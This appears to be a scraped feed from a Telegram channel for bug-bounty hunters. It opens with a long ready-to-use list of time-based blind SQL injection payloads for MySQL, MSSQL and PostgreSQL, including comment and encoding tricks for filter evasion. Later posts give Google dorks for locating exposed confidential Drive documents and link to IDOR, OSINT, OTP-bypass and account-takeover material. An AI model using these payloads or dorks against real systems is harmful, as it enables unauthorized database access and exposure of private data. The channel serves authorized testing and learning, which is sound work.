Brut Security
14.8K subscribers
938 photos
73 videos
287 files
983 links
βœ…Queries: @wtf_brut
πŸ›ƒWhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
πŸ“¨E-mail: [email protected]
Download Telegram
timebased payloads for different dbms:
XOR(if(now()=sysdate(),sleep(7),0))XOR%23
'or sleep(7)--#
'or sleep(7)#
'or sleep(7)='#
'or sleep(7)='--
'/*F*/or/*F*/sleep(7)='
'or sleep(7)--%23
'or sleep(7)%23
'or sleep(7);%00
or sleep(7)--+-
or sleep(7)#
'/*f*/or/*f*/sleep/*f*/(7)--#
'/*f*/or/*f*/sleep/*f*/(7)#
or sleep(7)%23
'/*f*/or/*f*/sleep/*f*/(7)--%23
'/*f*/or/*f*/sleep/*f*/(7)%23
'/*f*/or/*f*/sleep/*f*/(7);%00
or/*f*/sleep/*f*/(7)--+-
or/*f*/sleep/*f*/(7)#
'XOR(if(now()=sysdate(),sleep(7),0))XOR'
'OR(if(now()=sysdate(),sleep(7),0))--#
'OR(if(now()=sysdate(),sleep(7),0))#
or/*f*/sleep/*f*/(7)%23
'OR(if(now()=sysdate(),sleep(7),0))--%23
'OR(if(now()=sysdate(),sleep(7),0))%23
'OR(if(now()=sysdate(),sleep(7),0));%00
OR(if(now()=sysdate(),sleep(7),0))--+-
OR(if(now()=sysdate(),sleep(7),0))#
OR(if(now()=sysdate(),sleep(7),0))%23
'WAITFORDELAY'0:0:7';%00
'WAITFORDELAY'0:0:7'#
'WAITFORDELAY'0:0:7'%23
'WAITFORDELAY'0:0:7';%00
WAITFORDELAY'0:0:7'#
WAITFORDELAY'0:0:7'%23
WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'='
\/*F*/or/*f*/sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7)#
'/*f*/OR/*f*/pg_sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7);%00
/*f*/OR/*f*/pg_sleep(70)--+-
/*f*/OR/*f*/pg_sleep(70)#
/*f*/OR/*f*/pg_sleep(70)%23
'/*f*/OR/*f*/pg_sleep(7)=';%00
\)/*F*/or/*f*/sleep(7)%23
\)/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)--+-
%E2%84%A2\)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2%27)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2'/*F*/or/*f*/sleep(7)='
%E2%84%A2')/*F*/or/*f*/sleep(7)='
❀28πŸ‘13
This media is not supported in your browser
VIEW IN TELEGRAM
For Real Bruh 😭😭😭😭😭
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯15🐳2🀨2πŸ—Ώ2😁1
🌟One-Liner - Extract all URLs from the Source Code

curl "testphp.vulnweb.com" | grep -oP '(https*://|www\.)[^ ]*'


πŸ””@0x0SojalSec
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯24❀3πŸ‘3πŸ‘¨β€πŸ’»3🫑3
⚠️Google Drive Dorks
site:https://drive.google.com inurl:folder
site:https://drive.google.com inurl:open
site:https://docs.google.com inurl:d
site:https://drive.google.com "confidential"
site:https://docs.google.com inurl:d filetype:docx
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘9πŸ”₯7❀2
πŸ‘5πŸ”₯5
β˜„οΈIDOR Forge is an advanced and versatile tool designed to detect Insecure Direct Object Reference (IDOR) vulnerabilities in web applications.

πŸ›https://github.com/errorfiathck/IDOR-Forge
Please open Telegram to view this post
VIEW IN TELEGRAM
1πŸ”₯17❀6πŸ‘4πŸ‘¨β€πŸ’»2
Business Logic POC - Able To Unsubscribe User From Company
https://t.iss.one/brutsecurity_poc/16
❀11πŸ”₯5πŸ‘3
Drop Reactions β˜•οΈβ˜•οΈβ˜•οΈβ˜•οΈβ˜•οΈβ˜•οΈ
Please open Telegram to view this post
VIEW IN TELEGRAM
🫑16πŸ”₯10❀1🀨1πŸ‘¨β€πŸ’»1
πŸ””(Bug-Bounty) How to Know You are Ready for Full-Time Bug Bounty

βœ”οΈhttps://chintangurjar.com/posts/full-time-bug-bounty/
Please open Telegram to view this post
VIEW IN TELEGRAM
❀10🐳4πŸ‘1
Authentication Bypass: βš”οΈ
πŸ‘16πŸ”₯5
πŸ”–OTP Bypass Via Response Manipulation POC__ P3 - https://t.iss.one/brutsecurity_poc/17
Please open Telegram to view this post
VIEW IN TELEGRAM
Bystander: Passive Web Vulnerability Detection Tool

https://github.com/itsdivyanshjain/Bystander
πŸ‘13πŸ”₯3πŸ—Ώ2🐳1🀝1
⚑️⚑️⚑️⚑️Account takeover + OTP Bypass + no rate limit vulnerabilities on same functionality ---> https://t.iss.one/brutsecurity_poc/18
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘7❀5πŸ”₯2🀝2
Don't forget to Join the channel and Drop your Reactions!πŸ‘βœ¨
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘12πŸ”₯8
Brut Security pinned Β«Don't forget to Join the channel and Drop your Reactions!πŸ‘βœ¨Β»
πŸ•΅οΈβ€β™‚οΈ Offensive Google framework.
βœ…https://github.com/mxrch/GHunt
πŸ‘8πŸ”₯4
This media is not supported in your browser
VIEW IN TELEGRAM
Check out Hide Search Result, a tool that lets you filter out unwanted search results with ease πŸ”₯😎

βœ…
https://github.com/husseinphp/Hide-Search-Result
πŸ”₯8❀2πŸ‘2
Free Malware Analysis Course, covers malware concepts, malware analysis, and black-box reverse engineering techniquesπŸ–₯️

- class.malware.re
πŸ”₯28❀2πŸ‘2🐳2🀝1